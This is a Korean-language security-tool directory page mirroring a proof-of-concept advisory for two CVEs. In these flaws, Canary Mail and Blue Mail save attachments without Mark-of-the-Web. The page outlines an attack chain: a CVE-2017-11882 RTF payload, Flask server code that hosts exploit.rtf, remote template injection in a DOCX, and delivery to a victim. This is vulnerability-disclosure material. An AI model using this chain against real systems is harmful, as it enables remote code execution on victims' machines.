Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
Vulnerability AnalysisExploitationWeb Application ExploitationMalware AnalysisPenetration TestingLearning & Education
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

Canary Mail 또는 Blue mail 사용 시 안전하지 않은 첨부 파일 처리

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
78개월 전아직 검토되지 않음

CVE-2025-65318 및 CVE-2025-65319에 대한 PoC

  • CVE-2025-65318 (BDU:2025-13740): 첨부 파일 상호 작용 기능을 사용할 때, Canary Mail 5.1.40 이하는 Mark-of-the-Web 태그 없이 문서를 파일 시스템에 저장합니다. 이로 인해 공격자가 Windows OS 및 타사 소프트웨어의 내장 파일 보호 메커니즘을 우회할 수 있습니다.
  • CVE-2025-65319 (BDU:2025-13739): 첨부 파일 상호 작용 기능을 사용할 때, Blue Mail 1.140.103 이하는 Mark-of-the-Web 태그 없이 문서를 파일 시스템에 저장합니다. 이로 인해 공격자가 Windows OS 및 타사 소프트웨어의 내장 파일 보호 메커니즘을 우회할 수 있습니다.

개요

핵심 문제는 사용자가 악성 첨부 파일을 여는 것이 아니라, Canary Mail이나 Blue Mail과 같은 앱이 첨부 파일을 저장하거나 여는 데 편리하면서도 안전하지 않은 기능을 제공한다는 점입니다. 저는 이를 사용자를 공격자에게 노출시키는 보안 취약점으로 간주합니다.

CWE-693 - 보호 메커니즘 실패

PoC

"연결 프로그램(Open with)" 또는 "다른 이름으로 저장(Save as)" 대화 상자를 통해 Office Word 첨부 파일을 안전하지 않게 여는 것을 입증하기 위해, Office Word 16 이하의 수식 편집기에 존재하는 CVE-2017-11882 취약점이 사용되었습니다.

  1. 스크립트를 사용하여 공격자 호스트에서 계산기를 실행하는 악성 RTF 개체를 생성합니다.
  2. 원격 템플릿 주입(Remote Template Injection)을 사용하여 악성 RTF 문서를 전송하는 서버를 배포합니다.
root@kitploit:~
from flask import Flask, send_file, request
import logging
from datetime import datetime

app = Flask(__name__)

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

@app.before_request
def log_request_info():
    logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')

@app.after_request
def log_response_info(response):
    logger.info(f'Response: Status {response.status_code} for {request.url}')
    return response

@app.route('/download')
def download_file():
    try:
        response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
        logger.info('File download successful')
        return response
    except FileNotFoundError:
        logger.error('File exploit.rtf not found')
        return 'File not found', 404

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

  1. 임의의 DOCX 문서를 생성하고, 예를 들어 PowerShell 스크립트를 실행하여 원격 템플릿 주입(Remote Template Injection)을 사용합니다.
  2. 공격자는 생성된 악성 DOCX 문서를 피해자에게 전송합니다.
  3. 피해자는 Canary Mail/Blue Mail의 "연결 프로그램(Open with)" 또는 "다른 이름으로 저장(Save as)" 기능을 사용하여 악성 문서를 엽니다.
  4. 악성 문서를 열면 피해자는 추가 버튼을 누르지 않아도 침해될 수 있습니다.

영향

오래된 Microsoft Office Word 소프트웨어 버전 16 이하를 사용하는 사용자에게 발생할 수 있는 잠재적 RCE

영향을 받는 버전

  • Canary Mail 5.1.40 이하
  • Blue Mail 1.140.103 이하

동영상 PoC

CVE-2025-65318

https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

CVE-2025-65319

https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

참고 자료

  • https://bdu.fstec.ru/vul/2025-13739
  • https://bdu.fstec.ru/vul/2025-13740

면책 조항

이 저장소는 교육 및 방어적 보안 연구 목적으로만 제공됩니다.

도구 다운로드